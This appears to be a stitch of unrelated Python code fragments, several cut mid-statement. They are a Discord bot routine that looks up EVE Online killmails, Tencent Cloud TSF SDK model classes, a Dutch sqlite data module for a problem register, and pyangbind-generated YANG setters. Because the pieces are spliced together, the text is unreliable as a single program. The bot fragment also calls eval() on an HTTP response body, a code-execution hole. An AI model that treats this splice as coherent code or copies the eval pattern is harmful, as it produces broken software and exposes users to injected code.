flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
a = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
a = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
if flag_yes:
try:
victim_ship = self.items[ a[0]['victim']['ship_type_id'] ]
except:
victim_ship = a[0]['victim']['ship_type_id']
ship = 'Unknown'
for x in a[0]['attackers']:
try:
if x['character_id'] == f_id:
try:
ship = self.items[ x['ship_type_id'] ]
except:
try:
ship = x['ship_type_id']
except Exception as e:
print(e)
print('xxxxxxxxxxxxxxxxxxxx')
print(x.keys())
print('xxxxxxxxxxxxxxxxxxxx')
break
except Exception as e:
pass
print("x"*80)
print("PROBLEM ENUMERATING AN ATTACKER")
print(e)
print("x"*80)
print(x)
print("x"*80)
num_mail = len(a[0]['attackers'])
try:
_sys = self.systems[ a[0]['solar_system_id'] ]['name']
except:
try:
_sys = a[0]['solar_system_id']
except:
_sys = 'Unknown'
#try:
# sys_sec = round(self.systems[ a[0]['solar_system_id'] ]['security_status']),1)
#except:
# sys_sec = 'Unknown'
try:
since = a[0]['killmail_time']
ago = str(now-datetime.strptime(since, '%Y-%m-%dT%H:%M:%SZ'))[:-10].replace(' ','').replace('day','d')
except:
ago = 'Unknown'
pilot = f['name']
raw = f"{n} [{ago}] [{pilot}] {_sys} [{ship}] Kill:{victim_ship} #{num_mail}\n"
print(raw)
txt += raw
except Exception as e:
print("PROBLEM FETCHING FRIENDS")
print(e)
data += txt[:-1]
data = data.strip() + '```'
await bot.say(data)
except Exception as e:
print("ERROR IN SEARCH: {}".format(e))
return False
'''
@bot.command(pass_context=True)
async def play(ctx):
try:
| |
= None
self.DeleteFlag = None
self.CreateTime = None
self.UpdateTime = None
self.TsfRegionId = None
self.TsfRegionName = None
self.TsfZoneId = None
self.TsfZoneName = None
self.DeleteFlagReason = None
self.ClusterLimitCpu = None
self.ClusterLimitMem = None
self.RunServiceInstanceCount = None
self.SubnetId = None
self.OperationInfo = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ClusterDesc = params.get("ClusterDesc")
self.ClusterType = params.get("ClusterType")
self.VpcId = params.get("VpcId")
self.ClusterStatus = params.get("ClusterStatus")
self.ClusterCIDR = params.get("ClusterCIDR")
self.ClusterTotalCpu = params.get("ClusterTotalCpu")
self.ClusterTotalMem = params.get("ClusterTotalMem")
self.ClusterUsedCpu = params.get("ClusterUsedCpu")
self.ClusterUsedMem = params.get("ClusterUsedMem")
self.InstanceCount = params.get("InstanceCount")
self.RunInstanceCount = params.get("RunInstanceCount")
self.NormalInstanceCount = params.get("NormalInstanceCount")
self.DeleteFlag = params.get("DeleteFlag")
self.CreateTime = params.get("CreateTime")
self.UpdateTime = params.get("UpdateTime")
self.TsfRegionId = params.get("TsfRegionId")
self.TsfRegionName = params.get("TsfRegionName")
self.TsfZoneId = params.get("TsfZoneId")
self.TsfZoneName = params.get("TsfZoneName")
self.DeleteFlagReason = params.get("DeleteFlagReason")
self.ClusterLimitCpu = params.get("ClusterLimitCpu")
self.ClusterLimitMem = params.get("ClusterLimitMem")
self.RunServiceInstanceCount = params.get("RunServiceInstanceCount")
self.SubnetId = params.get("SubnetId")
if params.get("OperationInfo") is not None:
self.OperationInfo = OperationInfo()
self.OperationInfo._deserialize(params.get("OperationInfo"))
class Config(AbstractModel):
"""配置项
"""
def __init__(self):
"""
:param ConfigId: Configuration item ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigId: str
:param ConfigName: Configuration item name
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigName: str
:param ConfigVersion: Configuration item version
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigVersion: str
:param ConfigVersionDesc: Configuration item version description
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigVersionDesc: str
:param ConfigValue: Configuration item value
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigValue: str
:param ConfigType: Configuration item type
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigType: str
:param CreationTime: Creation time
Note: this field may return null, indicating that no valid value could be obtained.
:type CreationTime: str
:param ApplicationId: Application ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ApplicationId: str
:param ApplicationName: Application name
Note: this field may return null, indicating that no valid value could be obtained.
:type ApplicationName: str
:param DeleteFlag: Deletion flag; true: can be deleted, false: cannot be deleted
Note: this field may return null, indicating that no valid value could be obtained.
:type DeleteFlag: bool
:param LastUpdateTime: Last update time
Note: this field may return null, indicating that no valid value could be obtained.
:type LastUpdateTime: str
:param ConfigVersionCount: Number of configuration item versions
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigVersionCount: int
"""
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.ConfigVersionDesc = None
self.ConfigValue = None
self.ConfigType = None
self.CreationTime = None
self.ApplicationId = None
self.ApplicationName = None
self.DeleteFlag = None
self.LastUpdateTime = None
self.ConfigVersionCount = None
def _deserialize(self, params):
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.ConfigVersionDesc = params.get("ConfigVersionDesc")
self.ConfigValue = params.get("ConfigValue")
self.ConfigType = params.get("ConfigType")
self.CreationTime = params.get("CreationTime")
self.ApplicationId = params.get("ApplicationId")
self.ApplicationName = params.get("ApplicationName")
self.DeleteFlag = params.get("DeleteFlag")
self.LastUpdateTime = params.get("LastUpdateTime")
self.ConfigVersionCount = params.get("ConfigVersionCount")
class ConfigRelease(AbstractModel):
"""配置项发布信息
"""
def __init__(self):
"""
:param ConfigReleaseId: Configuration item release ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigReleaseId: str
:param ConfigId: Configuration item ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigId: str
:param ConfigName: Configuration item name
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigName: str
:param ConfigVersion: Configuration item version
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigVersion: str
:param ReleaseTime: Release time
Note: this field may return null, indicating that no valid value could be obtained.
:type ReleaseTime: str
:param GroupId: Deployment group ID
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupId: str
:param GroupName: Deployment group name
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupName: str
:param NamespaceId: Namespace ID
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceId: str
:param NamespaceName: Namespace name
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceName: str
:param ClusterId: Cluster ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterId: str
:param ClusterName: Cluster name
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterName: str
:param ReleaseDesc: Release description
Note: this field may return null, indicating that no valid value could be obtained.
:type ReleaseDesc: str
"""
self.ConfigReleaseId = None
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.ReleaseTime = None
self.GroupId = None
self.GroupName = None
self.NamespaceId = None
self.NamespaceName = None
self.ClusterId = None
self.ClusterName = None
self.ReleaseDesc = None
def _deserialize(self, params):
self.ConfigReleaseId = params.get("ConfigReleaseId")
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.ReleaseTime = params.get("ReleaseTime")
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ReleaseDesc = params.get("ReleaseDesc")
class ConfigReleaseLog(AbstractModel):
"""配置项发布日志
"""
def __init__(self):
"""
:param ConfigReleaseLogId: Configuration item release log ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigReleaseLogId: str
:param ConfigId: Configuration item ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigId: str
:param ConfigName: Configuration item name
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigName: str
:param ConfigVersion: Configuration item version
Note: this field may return null, indicating that no valid value could be obtained.
:type ConfigVersion: str
:param GroupId: Deployment group ID
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupId: str
:param GroupName: Deployment group name
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupName: str
:param NamespaceId: Namespace ID
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceId: str
:param NamespaceName: Namespace name
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceName: str
:param ClusterId: Cluster ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterId: str
:param ClusterName: Cluster name
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterName: str
:param ReleaseTime: Release time
Note: this field may return null, indicating that no valid value could be obtained.
:type ReleaseTime: str
:param ReleaseDesc: Release description
Note: this field may return null, indicating that no valid value could be obtained.
:type ReleaseDesc: str
:param ReleaseStatus: Release status
Note: this field may return null, indicating that no valid value could be obtained.
:type ReleaseStatus: str
:param LastConfigId: ID of the previously released configuration item
Note: this field may return null, indicating that no valid value could be obtained.
:type LastConfigId: str
:param LastConfigName: Name of the previously released configuration item
Note: this field may return null, indicating that no valid value could be obtained.
:type LastConfigName: str
:param LastConfigVersion: Version of the previously released configuration item
Note: this field may return null, indicating that no valid value could be obtained.
:type LastConfigVersion: str
:param RollbackFlag: Rollback flag
Note: this field may return null, indicating that no valid value could be obtained.
:type RollbackFlag: bool
"""
self.ConfigReleaseLogId = None
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.GroupId = None
self.GroupName = None
self.NamespaceId = None
self.NamespaceName = None
self.ClusterId = None
self.ClusterName = None
self.ReleaseTime = None
self.ReleaseDesc = None
self.ReleaseStatus = None
self.LastConfigId = None
self.LastConfigName = None
self.LastConfigVersion = None
self.RollbackFlag = None
def _deserialize(self, params):
self.ConfigReleaseLogId = params.get("ConfigReleaseLogId")
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ReleaseTime = params.get("ReleaseTime")
self.ReleaseDesc = params.get("ReleaseDesc")
self.ReleaseStatus = params.get("ReleaseStatus")
self.LastConfigId = params.get("LastConfigId")
self.LastConfigName = params.get("LastConfigName")
self.LastConfigVersion = params.get("LastConfigVersion")
self.RollbackFlag = params.get("RollbackFlag")
class ContainGroup(AbstractModel):
"""部署组列表(应用下钻界面的)
"""
def __init__(self):
"""
:param GroupId: Deployment group ID
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupId: str
:param GroupName: Group name
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupName: str
:param CreateTime: Creation time
Note: this field may return null, indicating that no valid value could be obtained.
:type CreateTime: str
:param Server: Image server
Note: this field may return null, indicating that no valid value could be obtained.
:type Server: str
:param RepoName: Image name, e.g. /tsf/nginx
Note: this field may return null, indicating that no valid value could be obtained.
:type RepoName: str
:param TagName: Image tag (version) name
Note: this field may return null, indicating that no valid value could be obtained.
:type TagName: str
:param ClusterId: Cluster ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterId: str
:param ClusterName: Cluster name
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterName: str
:param NamespaceId: Namespace ID
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceId: str
:param NamespaceName: Namespace name
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceName: str
:param CpuRequest: Initially allocated CPU cores, corresponding to the K8S request
Note: this field may return null, indicating that no valid value could be obtained.
:type CpuRequest: str
:param CpuLimit: Maximum allocated CPU cores, corresponding to the K8S limit
Note: this field may return null, indicating that no valid value could be obtained.
:type CpuLimit: str
:param MemRequest: Initially allocated memory in MiB, corresponding to the K8S request
Note: this field may return null, indicating that no valid value could be obtained.
:type MemRequest: str
:param MemLimit: Maximum allocated memory in MiB, corresponding to the K8S limit
Note: this field may return null, indicating that no valid value could be obtained.
:type MemLimit: str
"""
self.GroupId = None
self.GroupName = None
self.CreateTime = None
self.Server = None
self.RepoName = None
self.TagName = None
self.ClusterId = None
self.ClusterName = None
self.NamespaceId = None
self.NamespaceName = None
self.CpuRequest = None
self.CpuLimit = None
self.MemRequest = None
self.MemLimit = None
def _deserialize(self, params):
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.CreateTime = params.get("CreateTime")
self.Server = params.get("Server")
self.RepoName = params.get("RepoName")
self.TagName = params.get("TagName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.CpuRequest = params.get("CpuRequest")
self.CpuLimit = params.get("CpuLimit")
self.MemRequest = params.get("MemRequest")
self.MemLimit = params.get("MemLimit")
class ContainGroupResult(AbstractModel):
"""部署组列表(应用下钻)
"""
def __init__(self):
"""
:param Content: Deployment group list
Note: this field may return null, indicating that no valid value could be obtained.
:type Content: list of ContainGroup
:param TotalCount: Total number of records
:type TotalCount: int
"""
self.Content = None
self.TotalCount = None
def _deserialize(self, params):
if params.get("Content") is not None:
self.Content = []
for item in params.get("Content"):
obj = ContainGroup()
obj._deserialize(item)
self.Content.append(obj)
self.TotalCount = params.get("TotalCount")
class ContainerGroupDetail(AbstractModel):
"""容器部署组详情
"""
def __init__(self):
"""
:param GroupId: Deployment group ID
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupId: str
:param GroupName: Group name
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupName: str
:param InstanceNum: Total number of instances
Note: this field may return null, indicating that no valid value could be obtained.
:type InstanceNum: int
:param CurrentNum: Total number of started instances
Note: this field may return null, indicating that no valid value could be obtained.
:type CurrentNum: int
:param CreateTime: Creation time
Note: this field may return null, indicating that no valid value could be obtained.
:type CreateTime: str
:param Server: Image server
Note: this field may return null, indicating that no valid value could be obtained.
:type Server: str
:param Reponame: Image name, e.g. /tsf/nginx
Note: this field may return null, indicating that no valid value could be obtained.
:type Reponame: str
:param TagName: Image tag (version) name
Note: this field may return null, indicating that no valid value could be obtained.
:type TagName: str
:param ClusterId: Cluster ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterId: str
:param ClusterName: Cluster name
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterName: str
:param NamespaceId: Namespace ID
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceId: str
:param NamespaceName: Namespace name
Note: this field may return null, indicating that no valid value could be obtained.
:type NamespaceName: str
:param ApplicationId: Application ID
Note: this field may return null, indicating that no valid value could be obtained.
:type ApplicationId: str
:param LbIp: Load balancer IP
Note: this field may return null, indicating that no valid value could be obtained.
:type LbIp: str
:param ApplicationType: Application type
Note: this field may return null, indicating that no valid value could be obtained.
:type ApplicationType: str
:param ClusterIp: Service IP
Note: this field may return null, indicating that no valid value could be obtained.
:type ClusterIp: str
:param NodePort: NodePort port; only set for public network and NodePort access modes
Note: this field may return null, indicating that no valid value could be obtained.
:type NodePort: int
:param CpuLimit: Maximum allocated CPU cores, corresponding to the K8S limit
Note: this field may return null, indicating that no valid value could be obtained.
:type CpuLimit: str
:param MemLimit: Maximum allocated memory in MiB, corresponding to the K8S limit
Note: this field may return null, indicating that no valid value could be obtained.
:type MemLimit: str
:param AccessType: 0: public network, 1: in-cluster access, 2: NodePort
Note: this field may return null, indicating that no valid value could be obtained.
:type AccessType: int
:param UpdateType: Update mode: 0: fast update, 1: rolling update
Note: this field may return null, indicating that no valid value could be obtained.
:type UpdateType: int
:param UpdateIvl: Update interval, in seconds
Note: this field may return null, indicating that no valid value could be obtained.
:type UpdateIvl: int
:param ProtocolPorts: Array of port objects
Note: this field may return null, indicating that no valid value could be obtained.
:type ProtocolPorts: list of ProtocolPort
:param Envs: Array of environment variable objects
Note: this field may return null, indicating that no valid value could be obtained.
:type Envs: list of Env
:param ApplicationName: Application name
Note: this field may return null, indicating that no valid value could be obtained.
:type ApplicationName: str
:param Message: Description of the pod error message
Note: this field may return null, indicating that no valid value could be obtained.
:type Message: str
:param Status: Deployment group status
Note: this field may return null, indicating that no valid value could be obtained.
:type Status: str
:param MicroserviceType: Microservice type
Note: this field may return null, indicating that no valid value could be obtained.
:type MicroserviceType: str
:param CpuRequest: Initially allocated CPU cores, corresponding to the K8S request
Note: this field may return null, indicating that no valid value could be obtained.
:type CpuRequest: str
:param MemRequest: Initially allocated memory in MiB, corresponding to the K8S request
Note: this field may return null, indicating that no valid value could be obtained.
:type MemRequest: str
:param SubnetId: Subnet ID
Note: this field may return null, indicating that no valid value could be obtained.
:type SubnetId: str
:param GroupResourceType: Deployment group resource type
Note: this field may return null, indicating that no valid value could be obtained.
:type GroupResourceType: str
:param InstanceCount: Number of deployment group instances
Note: this field may return null, indicating that no valid value could be obtained.
:type InstanceCount: int
:param UpdatedTime: Deployment group update timestamp
Note: this field may return null, indicating that no valid value could be obtained.
:type UpdatedTime: int
:param MaxSurge: MaxSurge parameter of the Kubernetes rolling update strategy
Note: this field may return null, indicating that no valid value could be obtained.
:type MaxSurge: str
:param MaxUnavailable: MaxUnavailable parameter of the Kubernetes rolling update strategy
Note: this field may return null, indicating that no valid value could be obtained.
:type MaxUnavailable: str
"""
self.GroupId = None
self.GroupName = None
self.InstanceNum = None
self.CurrentNum = None
self.CreateTime = None
self.Server = None
self.Reponame = None
self.TagName = None
self.ClusterId = None
self.ClusterName = None
self.NamespaceId = None
self.NamespaceName = None
self.ApplicationId = None
self.LbIp = None
self.ApplicationType = | |
"""dml voor probreg met sql om dezelfde data te gebruiken die de Django versie
gebruikt
vervallen omdat we nu de versie gebruiken die met het Django ORM werkt
"""
## import sys
import os
import datetime as dt
import sqlite3 as sql
from contextlib import closing
import logging
from probreg.shared import DataError, DBLOC, USER, kopdict, statdict, catdict
def log(msg, *args, **kwargs):
"write message to log depending on DEBUG setting"
if 'DEBUG' in os.environ and os.environ['DEBUG']:
logging.info(msg, *args, **kwargs)
def getsql(con, cmd, item=None):
"""retrieval sql uitvoeren en resultaat teruggeven
resultaat = []: query mislukt
"""
log("getsql tweede argument: {0}".format(cmd))
log("getsql derde argument: {0}".format(item))
if item is None:
item = ()
try:
result = [x for x in con.execute(cmd, item)]
except (sql.ProgrammingError, sql.OperationalError) as err:
raise DataError(str(err))
return result
def doesql(con, cmd, item=None):
"""update sql uitvoeren en resultaat terugmelden
resultaat == "" : alles ok - anders foutmelding
"""
log("doesql tweede argument: {0}".format(cmd))
log("doesql derde argument: {0}".format(item))
if item is None:
item = ()
err = ""
try:
con.execute(cmd, item)
except (TypeError, ValueError, sql.IntegrityError,
sql.ProgrammingError, sql.OperationalError) as msg:
err = str(msg)
return err
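# Editor's example (sketch, not part of the original module): getsql/doesql are
# thin wrappers around a sqlite3 connection; with an in-memory database they
# behave like this.
def _demo_sql_helpers():
    with closing(sql.connect(':memory:')) as con:
        err = doesql(con, 'create table demo (id integer, name text)')
        err = err or doesql(con, 'insert into demo values (?, ?)', (1, 'test'))
        rows = getsql(con, 'select id, name from demo where id = ?', (1,))
        return err, rows   # ('', [(1, 'test')]) when everything works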
def complete_ids(dic):
"""ids genereren voor items met id = -1
input is een dictionary van 3-tuples (naam, volgorde, id)
elementen met een id van -1 krijgen in plaats van deze een passende waarde
(eerstvolgend hogere id)
"""
oldkeys, newkeys = [], []
for key, value in dic.items():
if len(value) < 3 or value[2] == -1:
newkeys.append(key)
else:
oldkeys.append((value[2], key))
if oldkeys:
oldkeys.sort()
last_id = int(oldkeys[-1][0])
else:
last_id = 0
for key in newkeys:
last_id += 1
dic[key] = (dic[key][0], dic[key][1], last_id)
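# Editor's example (sketch, illustrative data): complete_ids fills in the
# missing record ids while leaving existing ids untouched.
def _demo_complete_ids():
    data = {'0': ('reported', 0, 1), '1': ('in progress', 1, -1)}
    complete_ids(data)
    return data   # {'0': ('reported', 0, 1), '1': ('in progress', 1, 2)}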
def get_acties(naam, select=None, arch="", user=None):
"""selecteer acties; geef het resultaat terug of throw an exception
selectie mogelijk op id (groter dan / kleiner dan), soort, status, (deel van) titel
een selecteer-key mag een van de volgejde waarden zijn:
"idlt" - in dat geval moet de waarde een string zijn waarmee vergeleken wordt,
"idgt" - in dat geval moet de waarde een string zijn waarmee vergeleken wordt,
"soort" - in dat geval moet de waarde een list zijn van mogelijke soorten,
"status" - in dat geval moet de waarde een list zijn van mogelijke statussen,
"titel" - in dat geval moet de waarde een string zijn die in de titel moet voorkomen
eventueel wildcards:
als de string niet begint met een * dan moet de titel ermee beginnen
als de string niet eindigt met een * dan moet de titel ermee eindigen
als er een * in zit moet wat ervoor zit en erna komt in de titel zitten
het laatste argument `user` wordt niet gebruikt maar is voor compatibiliteit met de django versie
"""
if select is None:
select = {}
if "id" in select:
if "idlt" not in select and "idgt" not in select:
raise DataError("Foutieve combinatie van selectie-argumenten opgegeven")
sel = [""]
args = []
item_lt = select.pop("idlt", "")
enof = select.pop("id", "")
item_gt = select.pop("idgt", "")
if item_gt:
sel[0] += "nummer > ?"
if item_lt:
sel[0] = "({} {} ".format(sel[0], enof)
args.append(item_gt)
if item_lt:
sel[0] += "nummer < ?"
args.append(item_lt)
if item_gt:
sel[0] += ")"
if sel == [""]:
sel = []
item = select.pop("soort", "")
if item:
log(item)
if len(item) == 1:
sel.append("soort_id = ?")
args.append(item[0])
else:
append_to_sel = "soort_id in ("
for value in item[:-1]:
append_to_sel += "?,"
args.append(value)
sel.append(append_to_sel + '?)')
args.append(item[-1])
item = select.pop("status", "")
if item:
log(item)
if len(item) == 1:
sel.append("status_id = ?")
args.append(item[0])
else:
append_to_sel = "status_id in ("
for value in item[:-1]:
append_to_sel += "?,"
args.append(value)
sel.append(append_to_sel + '?)')
args.append(item[-1])
item = select.pop("titel", "")
if item:
sel.append("(about like ? or {0}_actie.title like ?)".format(naam))
args.append("%{0}%".format(item))
args.append("%{0}%".format(item))
if select:
raise DataError("Foutief selectie-argument opgegeven")
if arch == "":
sel.append("arch = 0")
elif arch == "arch":
sel.append("arch = 1")
elif arch != "alles":
raise DataError("Foutieve waarde voor archief opgegeven "
"(moet niks, 'arch' of 'alles' zijn)")
con = sql.connect(DBLOC)
cmd = "select nummer, start, {0}_status.title, {0}_status.value, {0}_soort.title, " \
"{0}_soort.value, about, {0}_actie.title, gewijzigd from {0}_actie " \
"join {0}_soort on {0}_soort.id = {0}_actie.soort_id " \
"join {0}_status on {0}_status.id = {0}_actie.status_id ".format(naam)
if sel:
cmd += "where {0}".format(" and ".join(sel))
data = getsql(con, cmd, args)
if data or len(data) == 0:
return data
else:
raise DataError(naam + " bestaat niet")
class Settings:
"""instellingen voor project
buffer tussen programma en database
self.kop is een dict met volgnummer als key en titel en link als waarde
self.stat is een dict met code als key en titel, volgorde en record-id
als waarde
self.cat idem
de get methoden zijn voor het gemak
wijzigen doe je maar direct in de attributen (properties van maken?)
"""
def __init__(self, fnaam=""):
self.kop = kopdict
self.stat = statdict
self.cat = catdict
self.imagecount = 0 # compatability with dml_xml.py
self.meld = ''
if fnaam == "":
self.meld = "Standaard waarden opgehaald"
return
self.naam = fnaam
self.read()
def read(self):
"settings lezen"
with closing(sql.connect(DBLOC)) as con:
meld = self._read(con)
self.exists = meld == ''
def _read(self, con):
"get settings from database"
con.row_factory = sql.Row
try:
data = getsql(con,
'select * from {0}_page order by "order"'.format(self.naam))
except DataError as err:
self.meld = "{} bestaat niet ({})".format(self.naam, err)
return
self.kop = {}
for row in data:
self.kop[str(row["order"])] = (row["title"], row["link"])
try:
data = getsql(con, "select * from {0}_status".format(self.naam))
except DataError as err:
self.meld = "Er is iets misgegaan ({})".format(err)
return
self.stat = {}
for row in data:
self.stat[str(row["value"])] = (row["title"], row["order"], row["id"])
try:
data = getsql(con, "select * from {0}_soort".format(self.naam))
except DataError as err:
self.meld = "Er is iets misgegaan ({})".format(err)
return
self.cat = {}
for row in data:
self.cat[row["value"]] = (row["title"], row["order"], row["id"])
def write(self, srt):
"settings terugschrijven"
with closing(sql.connect(DBLOC)) as con:
if self.exists:
rtn = self._write_existing(con, srt)
else:
rtn = self._write_new(con, srt)
if rtn:
con.rollback()
raise DataError(rtn)
else:
con.commit()
def _write_existing(self, con, srt):
"modify existing settings in datadase"
con.row_factory = sql.Row
if srt == 'kop':
_pages = getsql(con,
'select * from {0}_page order by "order"'.format(self.naam))
rtn = 0
for item in _pages:
idx = str(item["order"])
if self.kop[idx] != (item["title"], item["link"]):
rtn = doesql(con, "update {}_page set title = ?,"
' link = ? where "order" = ?'.format(self.naam),
(self.kop[idx][0], self.kop[idx][1], idx))
if rtn:
break
elif srt == 'stat':
rtn = doesql(con, 'delete from {0}_status'.format(self.naam), None)
if not rtn:
complete_ids(self.stat)
for key, value in self.stat.items():
rtn = doesql(con, 'insert into {0}_status (id, value, '
'title, "order") values (?, ?, ?, ?)'.format(self.naam),
(value[2], key, value[0], value[1]))
if rtn:
break
elif srt == 'cat':
rtn = doesql(con, "delete from {0}_soort".format(self.naam), None)
if not rtn:
complete_ids(self.cat)
for key, value in self.cat.items():
rtn = doesql(con, 'insert into {0}_soort (id, value, '
'title, "order") values (?, ?, ?, ?)'.format(self.naam),
(value[2], key, value[0], value[1]))
if rtn:
break
return rtn
def _write_new(self, con, srt):
"initialize new settings in database"
rtn = ''
if srt == 'kop':
for order, item in self.kop.items():
rtn = doesql(con, "insert into {0}_page values"
' (?,?,?,?)'.format(self.naam),
(int(order) + 1, item[0], item[1], int(order)))
if rtn:
break
return rtn
def get_statusid(self, waarde):
"geef id bij statuscode of -tekst"
log(waarde, type(waarde), sep=" ")
for code, value in self.stat.items():
log(code, type(code), value, sep=" ")
text, sortkey, row_id = value
## if int(waarde) == key or str(waarde) == key or waarde == value[0]:
if waarde == code or waarde == text:
return row_id
raise DataError("geen status bij code of omschrijving '{}' gevonden".format(
waarde))
def get_soortid(self, waarde):
"geef id bij soortcode of -tekst"
for code, value in self.cat.items():
text, sortkey, row_id = value
if waarde == code or waarde == text:
return row_id
raise DataError("geen soort bij code of omschrijving '{}' gevonden".format(
waarde))
def get_statustext(self, waarde):
"geef tekst bij statuscode of -id"
try:
return self.stat[waarde][0]
except KeyError:
pass
for text, sortkey, row_id in self.stat.values():
if waarde == sortkey or waarde == row_id:
return text
raise DataError("Geen omschrijving gevonden bij statuscode of -id '{}'".format(
waarde))
def get_soorttext(self, waarde):
"geef tekst bij soortcode of -id"
try:
return self.cat[waarde][0]
except KeyError:
pass
| |
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /nst/netslice_vld/name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
YANG Description: Virtual Link Descriptor (VLD) name.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__name = t
if hasattr(self, '_set'):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_short_name(self):
"""
Getter method for short_name, mapped from YANG variable /nst/netslice_vld/short_name (string)
YANG Description: Short name to appear as label in the UI
"""
return self.__short_name
def _set_short_name(self, v, load=False):
"""
Setter method for short_name, mapped from YANG variable /nst/netslice_vld/short_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_short_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_short_name() directly.
YANG Description: Short name to appear as label in the UI
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """short_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__short_name = t
if hasattr(self, '_set'):
self._set()
def _unset_short_name(self):
self.__short_name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_vendor(self):
"""
Getter method for vendor, mapped from YANG variable /nst/netslice_vld/vendor (string)
YANG Description: Provider of the VLD.
"""
return self.__vendor
def _set_vendor(self, v, load=False):
"""
Setter method for vendor, mapped from YANG variable /nst/netslice_vld/vendor (string)
If this variable is read-only (config: false) in the
